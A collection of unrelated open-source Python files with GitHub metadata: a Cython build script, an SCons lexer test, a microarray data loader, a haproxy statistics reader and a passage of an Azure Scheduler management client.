"size": "9544",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pyreach/impl/force_torque_sensor_impl_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5276899"
},
{
"name": "Shell",
"bytes": "15836"
}
],
"symlink_target": ""
}
|
from distutils.core import setup
from Cython.Build import cythonize
from distutils.extension import Extension
# Compile the Cython module aptestmetricdt.pyx into the APzdtheta extension
# (typically invoked as: python setupaptest.py build_ext --inplace).
setup(name="APzdtheta", ext_modules=cythonize('aptestmetricdt.pyx'),)
#ext_modules=[Extension("demo",sources=["demo.pyx"],libraries=["m"] # Unix-like specific)]
#setup( name = "Demos",ext_modules = cythonize(ext_modules))
|
{
"content_hash": "a66c493e483a6f700ba9f668d836e8e6",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 90,
"avg_line_length": 37.22222222222222,
"alnum_prop": 0.7611940298507462,
"repo_name": "rohinkumar/galsurveystudy",
"id": "6651afbab612a9c53abb81e65310b6a821d2b2fb",
"size": "335",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "APTest/setupaptest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gnuplot",
"bytes": "2421"
},
{
"name": "HTML",
"bytes": "26305"
},
{
"name": "Jupyter Notebook",
"bytes": "204271897"
},
{
"name": "PostScript",
"bytes": "40488"
},
{
"name": "Python",
"bytes": "59235"
},
{
"name": "Shell",
"bytes": "211"
},
{
"name": "TeX",
"bytes": "63471"
}
],
"symlink_target": ""
}
|
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test that the $LEXCOMSTR construction variable allows you to customize
the displayed string when lex is called.
"""
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('mylex.py', """
import sys
outfile = open(sys.argv[1], 'wb')
for f in sys.argv[2:]:
infile = open(f, 'rb')
for l in [l for l in infile.readlines() if l != '/*lex*/\\n']:
outfile.write(l)
sys.exit(0)
""")
test.write('SConstruct', """
env = Environment(tools=['default', 'lex'],
LEXCOM = r'%(_python_)s mylex.py $TARGET $SOURCES',
LEXCOMSTR = 'Lexing $TARGET from $SOURCE')
env.CFile(target = 'aaa', source = 'aaa.l')
env.CFile(target = 'bbb', source = 'bbb.lex')
""" % locals())
test.write('aaa.l', "aaa.l\n/*lex*/\n")
test.write('bbb.lex', "bbb.lex\n/*lex*/\n")
test.run(stdout = test.wrap_stdout("""\
Lexing aaa.c from aaa.l
Lexing bbb.c from bbb.lex
"""))
test.must_match('aaa.c', "aaa.l\n")
test.must_match('bbb.c', "bbb.lex\n")
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
{
"content_hash": "7aba558c0817bd679523ed23b81857ad",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 73,
"avg_line_length": 29.805194805194805,
"alnum_prop": 0.6910675381263617,
"repo_name": "azatoth/scons",
"id": "83b2f9c002661bdce69c812cd4ee6c50eaf8f227",
"size": "2295",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "test/LEX/LEXCOMSTR.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "259"
},
{
"name": "JavaScript",
"bytes": "17316"
},
{
"name": "Perl",
"bytes": "45214"
},
{
"name": "Python",
"bytes": "6716123"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
}
|
from os.path import join, isfile
from os import unlink
from subprocess import call
from re import compile
from numpy import array, mean, genfromtxt, zeros_like, arange
from sqlalchemy import distinct
from scipy.stats import ttest_ind
from trnlib import settings, timing
from trnlib.omeORM import *
from itertools import combinations
# Normalization R script invoked via Rscript by process_array_expression_data.
normalize_script = join(settings.trn_directory, "database", "loading", "normalize.R")
def create_translator(session, annotation_file=settings.data_directory + "annotation/GPL3154.tab"):
    """create dict to translate from affy id to database gene wid

    Returns (affyid2wid, bnum2wid).  Deliberately does not fall back to
    synonym lookup for unknown b-numbers.
    """
    bnum2wid = dict(session.query(Gene.bnum, Gene.wid))
    affyid2wid = {}
    bnum_pattern = compile(r"b\d{4}")
    with open(annotation_file) as annotations:
        for line in annotations:
            if line.startswith('#'):
                continue
            fields = line.split('\t')
            # Only keep entries whose second column is a b-number we know.
            if bnum_pattern.match(fields[1]) and fields[1] in bnum2wid:
                affyid2wid[fields[0]] = bnum2wid[fields[1]]
    return affyid2wid, bnum2wid
def create_experiments(session, header_line, experiment_set, platform):
    """create the appropriate experiments
    input: header_line from normalize script output with CEL filenames
    output: list of created experiment wids"""
    experiments = []
    cols = header_line.rstrip('\n').split('\t')
    for col in cols:
        if col == '': continue
        # Filename convention: TYPE_STRAIN_CSOURCE_NSOURCE_EACCEPTOR_REP.CEL
        # NOTE(review): rstrip('.CEL') strips a character *set*, not the
        # suffix — names ending in C/E/L/. may be over-stripped; verify.
        vals = col.rstrip('.CEL').split('_')
        exp_type = vals[0]
        strain = vals[1]
        csource = vals[2]
        nsource = vals[3]
        eacceptor = vals[4]
        replicate = int(vals[5])
        condition = get_or_create_condition(session, carbon_source=csource,
            nitrogen_source=nsource, eacceptor=eacceptor)
        strain_object = get_or_create(session, Strain, name=strain)
        # link knockout correctly
        knockout_gene = session.query(Gene).filter_by(
            name=strain.replace("delta-", "")).first()
        if knockout_gene is not None:
            if knockout_gene not in strain_object.knockouts:
                strain_object.knockouts.append(knockout_gene)
        session.add(strain_object)
        session.commit()
        tmp = strain.split('-')
        try: target = tmp[1]
        except: target = tmp[0]
        # TODO make sure the experiment doesn't already exist
        # if session.query(Dataset).filter_by(name=col).first() is not None:
        #     print "already in", session.query(Dataset).filter_by(name=col).first()#raise Exception("already in the database")
        dataset = Dataset(name=col)
        session.add(dataset)
        session.commit()
        experiment = ArrayExperiment()
        experiment.platform = platform
        experiment.condition = condition
        experiment.strain = strain_object
        experiment.replicate = replicate
        experiment.name = col # todo - make link to dataset, and use experiment set
        experiment.experiment_set = experiment_set
        session.add(experiment)
        session.commit()
        # The commit above must have assigned a database id.
        assert experiment.wid is not None
        experiments.append(experiment)
    return experiments
def calculate_differential_expression(session, condition1, condition2, strain1, strain2, platform, experiment_set):
    """calculate differential expression (fold change and q)

    Compares expression values between (condition1, strain1) and
    (condition2, strain2) and returns (bnums, fold_change, q), filtered to
    genes with at least one sample above the platform-average cutoff.

    Fix: the leftover ``from IPython import embed; embed()`` debug hooks
    (behind bare excepts) have been removed — a shape mismatch or NaN
    q-value now surfaces to the caller instead of dropping into an
    interactive shell.
    """
    query_args = {"platform": platform, "experiment_set": experiment_set}
    bnums = array([i[0] for i in session.query(distinct(ExpressionData.bnum)).
                   filter_by(**query_args)])
    n_genes = len(bnums)
    # query data, ordered by bnum so both conditions line up row-for-row
    d1_query = session.query(ExpressionData.value).filter_by(condition=condition1, strain=strain1, **query_args).order_by(ExpressionData.bnum)
    d2_query = session.query(ExpressionData.value).filter_by(condition=condition2, strain=strain2, **query_args).order_by(ExpressionData.bnum)
    d1 = array(d1_query.all()).reshape(n_genes, -1)
    d2 = array(d2_query.all()).reshape(n_genes, -1)
    # filter the data, using the average of all values in the platform file as a cutoff
    cutoff = mean(genfromtxt("%s/expression/CEL/IG_formatted_%s.tab" % (settings.data_directory, platform))[:, 1:])
    # keep genes where at least one sample in either condition exceeds the cutoff
    selection = (d1.max(axis=1) > cutoff) | (d2.max(axis=1) > cutoff)
    d1 = d1[selection, :]
    d2 = d2[selection, :]
    bnums = bnums[selection]
    # calculate fold change (difference of means)
    fold_change = (d1.mean(axis=1) - d2.mean(axis=1))
    # calculate t-test statistics
    t, p = ttest_ind(d1, d2, axis=1)  # independent t-test
    # perform Benjamini-Hochberg correction (similar to p.adjust(p_values, method="BH") in R)
    n_total = len(p)
    ranks = zeros_like(p)
    ranks[p.argsort()] = arange(n_total) + 1.0  # ranks must be floats starting with 1
    q = p * n_total / ranks  # each entry is scaled by n_total / its rank
    q[q > 1] = 1.0  # maximum value is 1
    # NOTE: q may contain NaN for zero-variance genes; callers must handle it.
    return bnums, fold_change, q
def process_differential_expression(session, experiment_set, platform, experiments=None):
    """Pick comparable experiment pairs and run differential expression on each.

    Pairs are compared only when either (a) the strains match and exactly one
    growth-condition attribute differs (a single shift), or (b) the strains
    differ, one of them is wild type, and the conditions are identical.
    If no experiments are given, every experiment in the set is used.
    """
    if experiments is None:
        experiments = experiment_set.array_experiments
    # Map each (strain, condition) pair to the wid of its experiment.
    condition_wids = {(exp.strain, exp.condition): exp.wid for exp in experiments}
    for pair in combinations(condition_wids.keys(), 2):
        (strain_a, cond_a), (strain_b, cond_b) = sorted(pair, key=str)
        if strain_a == strain_b:
            # Same strain: keep only single-shift comparisons.
            n_shifts = sum([cond_a.carbon_source != cond_b.carbon_source,
                            cond_a.nitrogen_source != cond_b.nitrogen_source,
                            cond_a.eacceptor != cond_b.eacceptor,
                            cond_a.other != cond_b.other,
                            cond_a.temperature != cond_b.temperature])
            if n_shifts != 1:
                continue
        else:
            # Different strains: one must be wild type ...
            if "wt" not in (strain_a.name, strain_b.name):
                continue
            # ... and the conditions must be identical.
            if cond_a != cond_b:
                continue
        wid_a = condition_wids[(strain_a, cond_a)]
        wid_b = condition_wids[(strain_b, cond_b)]
        result = calculate_differential_expression(
            session, cond_a, cond_b, strain_a, strain_b, platform, experiment_set)
        upload_differential_expression(session, wid_a, wid_b, *result)
def upload_differential_expression(session, exp_wid_1, exp_wid_2, bnums, fold_change, fdr):
    """Store fold-change and t-test q values for one experiment comparison."""
    shared = {"experiment_wid_1": exp_wid_1, "experiment_wid_2": exp_wid_2}
    # bnums, fold_change and fdr are parallel arrays of equal length.
    for bnum, fc, q in zip(bnums, fold_change, fdr):
        session.add(ArrayAnalysis(bnum=bnum, type="fold_change", value=fc, **shared))
        session.add(ArrayAnalysis(bnum=bnum, type="ttest", value=q, **shared))
    session.commit()
@timing
def process_array_expression_data(session, folder, platform, experiment_set=None, differential_expression=True):
    """Normalize a folder of array data with R, upload it, and optionally run
    pairwise differential expression over the resulting experiment set.

    folder -- directory with the raw data; R writes normalized_data.txt there
    platform -- array platform name (e.g. "asv2"); selects how probe ids in
                column 0 are mapped to gene wids
    """
    # first need to normalize the data (delete any stale output first)
    normalized_file_path = join(folder, "normalized_data.txt")
    if isfile(normalized_file_path):
        unlink(normalized_file_path)
    call([settings.Rscript, "--slave", normalize_script], cwd=folder)
    # make sure the R script worked
    if not isfile(normalized_file_path):
        raise Exception("R script failed to run")
    # create dicts to map probe ids / bnums to gene wids
    affyid2wid, bnum2wid = create_translator(session)
    datafile = open(normalized_file_path)
    header = datafile.readline()
    experiments = create_experiments(session, header, experiment_set, platform)
    # process the datafile and upload the data
    re_search = compile(r"b\d{4}")
    for line in datafile.readlines():
        gene_wid = None
        vals = line.strip().split('\t')
        if platform == "asv2":
            # asv2 probe names embed the bnum directly
            found_bnums = re_search.findall(vals[0])
            if len(found_bnums) == 1:
                try:
                    gene_wid = bnum2wid[found_bnums[0]]
                except KeyError:  # BUG FIX: was a bare except; only a missing bnum is expected
                    continue
        else:
            try:
                gene_wid = affyid2wid[vals[0]]
            except KeyError:
                continue  # not a gene
        if gene_wid is None:
            continue
        # Bulk-insert every value for this gene; RETURNING yields the new wids.
        # NOTE(review): values are interpolated straight into the SQL string.
        # They come from the R output file, but bound parameters would be safer.
        query_str = "INSERT INTO array_data(value, experiment_WID) VALUES"
        for i, experiment in enumerate(experiments):
            query_str += " (%s, %i)," % (vals[i + 1], experiment.wid)
        query_str = query_str.strip(",") + " RETURNING wid;"
        array_wids = [i[0] for i in session.execute(query_str).fetchall()]
        query_str = "INSERT INTO array_mapping(gene_WID, array_WID) VALUES"
        for array_wid in array_wids:
            query_str += " (%i, %i)," % (gene_wid, array_wid)
        query_str = query_str.strip(",") + ";"
        session.execute(query_str)
    datafile.close()
    session.commit()
    unlink(normalized_file_path)
    # set up differential expression tests
    if differential_expression:
        process_differential_expression(session, experiment_set, platform, experiments=experiments)
if __name__ == "__main__":
import os
print "starting reset"
os.system("%s < ../schemas/kb_schema_ome_affy.sql > psql.log 2>&1" % (settings.psql_full))
os.system("%s < ../schemas/kb_schema_ome_views.sql > psql.log 2>&1" % (settings.psql_full))
print "reset done"
from trnlib.omeORM import *
session = Session()
session.execute("delete from datasets where name like 'affyexp%';")
session.commit()
ec2_dataset = session.get_or_create(Dataset,
name="ec2 affy data", lab="sbrg", institution="ucsd")
ec2_exp_set = session.get_or_create(ExperimentSet,
dataset=ec2_dataset, type="affy")
process_array_expression_data(session, folder, "ec2", experiment_set=ec2_exp_set)
|
{
"content_hash": "0a5f74a9390acc8e73141dc08d641c46",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 142,
"avg_line_length": 44.08898305084746,
"alnum_prop": 0.6249879865449304,
"repo_name": "steve-federowicz/om",
"id": "4d7640224e258926ad2e366bd58f622405edb048",
"size": "10405",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "om/loading/array_expression.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "42989"
},
{
"name": "Python",
"bytes": "197913"
},
{
"name": "Shell",
"bytes": "6704"
}
],
"symlink_target": ""
}
|
import os
import socket
import sys
import csv
# Base directory holding one sub-directory (with haproxy.sock) per pool.
HAPROXY_DIR = '/var/lib/contrail/loadbalancer/haproxy/'
# Maps the stat names we report to the column names in haproxy's CSV output.
STATS_MAP = {
    'active_connections': 'qcur',
    'max_connections': 'qmax',
    'current_sessions': 'scur',
    'max_sessions': 'smax',
    'total_sessions': 'stot',
    'bytes_in': 'bin',
    'bytes_out': 'bout',
    'connection_errors': 'econ',
    'response_errors': 'eresp',
    'status': 'status',
    'health': 'check_status',
    'failed_checks': 'chkfail'
}
# Bitmask for haproxy's "show stat" command:
# 1 + 2 + 4 = 7 for frontend + backend + server
REQUEST_TYPE = 7
# response types: value of the 'type' column in each returned CSV row
TYPE_FRONTEND_RESPONSE = '0'
TYPE_BACKEND_RESPONSE = '1'
TYPE_SERVER_RESPONSE = '2'
class HaproxyStats(object):
    """Reads per-pool load-balancer statistics from haproxy admin sockets."""

    def __init__(self):
        # Directory containing one sub-directory per pool, each holding
        # the pool's haproxy.sock admin socket.
        self.lbaas_dir = HAPROXY_DIR

    def get_stats(self, pool_id):
        """Return listener/pool/member stats for one pool.

        Returns {} if the pool's stats socket is missing or returned no rows.
        """
        sock_path = os.path.join(self.lbaas_dir, pool_id, 'haproxy.sock')
        if not os.path.exists(sock_path):
            sys.stderr.write('\nStats socket not found for pool ' + pool_id)
            return {}
        lb_stats = {}
        lb_stats.setdefault('listener', [])
        lb_stats.setdefault('pool', [])
        lb_stats.setdefault('member', [])
        raw_stats = self._read_stats(sock_path)
        row_count = 0
        # haproxy prefixes the CSV header with "# "; strip it so DictReader
        # sees proper column names.
        for row in csv.DictReader(raw_stats.lstrip('# ').splitlines()):
            row_count = row_count + 1
            if row.get('type') == TYPE_FRONTEND_RESPONSE:
                lb_stats['listener'].append(self._get_stats(row, row['pxname']))
            elif row.get('type') == TYPE_BACKEND_RESPONSE:
                lb_stats['pool'].append(self._get_stats(row, row['pxname']))
            elif row.get('type') == TYPE_SERVER_RESPONSE:
                lb_stats['member'].append(self._get_stats(row, row['svname']))
        if (row_count == 0):
            return {}
        return lb_stats

    def _get_stats(self, row, name):
        """Project one CSV row onto STATS_MAP and normalize the status field."""
        stats = dict((k, row.get(v, ''))
                     for k, v in STATS_MAP.items())
        stats['name'] = name
        stats['vrouter'] = socket.gethostname()
        # 'no check'/'UP'/'OPEN' all mean the object is serving traffic.
        if stats['status'] in ['no check', 'UP', 'OPEN']:
            stats['status'] = 'ACTIVE'
        else:
            stats['status'] = 'DOWN'
        return stats

    def _read_stats(self, socket_path):
        """Fetch raw CSV stats from a haproxy admin socket; '' on error."""
        raw_stats = ''
        s = None
        try:
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            s.connect(socket_path)
            s.send('show stat -1 %s -1\n' % REQUEST_TYPE)
            chunk_size = 1024
            while True:
                chunk = s.recv(chunk_size)
                raw_stats += chunk
                # A short read means haproxy finished sending.
                if len(chunk) < chunk_size:
                    break
        except socket.error as e:
            sys.stderr.write('\nstats socket error: ' + str(e))
        finally:
            # BUG FIX: the socket was previously leaked on every call.
            if s is not None:
                s.close()
        return raw_stats
|
{
"content_hash": "c2105f5068fcf6cfa49d0fe1dc47628b",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 80,
"avg_line_length": 31.96511627906977,
"alnum_prop": 0.5405602037104401,
"repo_name": "codilime/contrail-controller",
"id": "aef4b325cc0df7478a6378296be4c00f847f1872",
"size": "2749",
"binary": false,
"copies": "2",
"ref": "refs/heads/windows3.1",
"path": "src/nodemgr/vrouter_nodemgr/haproxy_stats.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "96717"
},
{
"name": "C++",
"bytes": "20662554"
},
{
"name": "CSS",
"bytes": "531"
},
{
"name": "GDB",
"bytes": "44610"
},
{
"name": "HTML",
"bytes": "519766"
},
{
"name": "Java",
"bytes": "171966"
},
{
"name": "LLVM",
"bytes": "2937"
},
{
"name": "Lua",
"bytes": "19459"
},
{
"name": "Makefile",
"bytes": "12449"
},
{
"name": "PowerShell",
"bytes": "1784"
},
{
"name": "Python",
"bytes": "5590763"
},
{
"name": "Roff",
"bytes": "40925"
},
{
"name": "Shell",
"bytes": "52721"
},
{
"name": "Thrift",
"bytes": "8382"
},
{
"name": "Yacc",
"bytes": "35530"
}
],
"symlink_target": ""
}
|
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
# NOTE(review): this class appears to be generated client code (AutoRest-style
# Azure SDK); prefer regenerating over hand-editing the request plumbing.
class JobCollectionsOperations(object):
    """JobCollectionsOperations operations.
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self.config = config
    def list_by_subscription(
            self, custom_headers=None, raw=False, **operation_config):
        """Gets all job collections under specified subscription.
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: :class:`JobCollectionDefinitionPaged
         <azure.mgmt.scheduler.models.JobCollectionDefinitionPaged>`
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Closure handed to the Paged iterator: builds the first-page URL
        # itself, later pages arrive as absolute next links.
        def internal_paging(next_link=None, raw=False):
            if not next_link:
                # Construct URL
                url = '/subscriptions/{subscriptionId}/providers/Microsoft.Scheduler/jobCollections'
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
            else:
                url = next_link
                query_parameters = {}
            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, **operation_config)
            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            return response
        # Deserialize response
        deserialized = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies)
        if raw:
            header_dict = {}
            client_raw_response = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response
        return deserialized
    def list_by_resource_group(
            self, resource_group_name, custom_headers=None, raw=False, **operation_config):
        """Gets all job collections under specified resource group.
        :param resource_group_name: The resource group name.
        :type resource_group_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: :class:`JobCollectionDefinitionPaged
         <azure.mgmt.scheduler.models.JobCollectionDefinitionPaged>`
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Same paging closure pattern as list_by_subscription, scoped to one
        # resource group.
        def internal_paging(next_link=None, raw=False):
            if not next_link:
                # Construct URL
                url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections'
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
            else:
                url = next_link
                query_parameters = {}
            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, **operation_config)
            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            return response
        # Deserialize response
        deserialized = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies)
        if raw:
            header_dict = {}
            client_raw_response = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response
        return deserialized
    def get(
            self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
        """Gets a job collection.
        :param resource_group_name: The resource group name.
        :type resource_group_name: str
        :param job_collection_name: The job collection name.
        :type job_collection_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: :class:`JobCollectionDefinition
         <azure.mgmt.scheduler.models.JobCollectionDefinition>`
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('JobCollectionDefinition', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    def create_or_update(
            self, resource_group_name, job_collection_name, job_collection, custom_headers=None, raw=False, **operation_config):
        """Provisions a new job collection or updates an existing job collection.
        :param resource_group_name: The resource group name.
        :type resource_group_name: str
        :param job_collection_name: The job collection name.
        :type job_collection_name: str
        :param job_collection: The job collection definition.
        :type job_collection: :class:`JobCollectionDefinition
         <azure.mgmt.scheduler.models.JobCollectionDefinition>`
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: :class:`JobCollectionDefinition
         <azure.mgmt.scheduler.models.JobCollectionDefinition>`
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        body_content = self._serialize.body(job_collection, 'JobCollectionDefinition')
        # Construct and send request
        request = self._client.put(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, **operation_config)
        # 200 = updated existing collection, 201 = created a new one.
        if response.status_code not in [200, 201]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('JobCollectionDefinition', response)
        if response.status_code == 201:
            deserialized = self._deserialize('JobCollectionDefinition', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    def patch(
            self, resource_group_name, job_collection_name, job_collection, custom_headers=None, raw=False, **operation_config):
        """Patches an existing job collection.
        :param resource_group_name: The resource group name.
        :type resource_group_name: str
        :param job_collection_name: The job collection name.
        :type job_collection_name: str
        :param job_collection: The job collection definition.
        :type job_collection: :class:`JobCollectionDefinition
         <azure.mgmt.scheduler.models.JobCollectionDefinition>`
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: :class:`JobCollectionDefinition
         <azure.mgmt.scheduler.models.JobCollectionDefinition>`
        :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        body_content = self._serialize.body(job_collection, 'JobCollectionDefinition')
        # Construct and send request
        request = self._client.patch(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('JobCollectionDefinition', response)
        if raw:
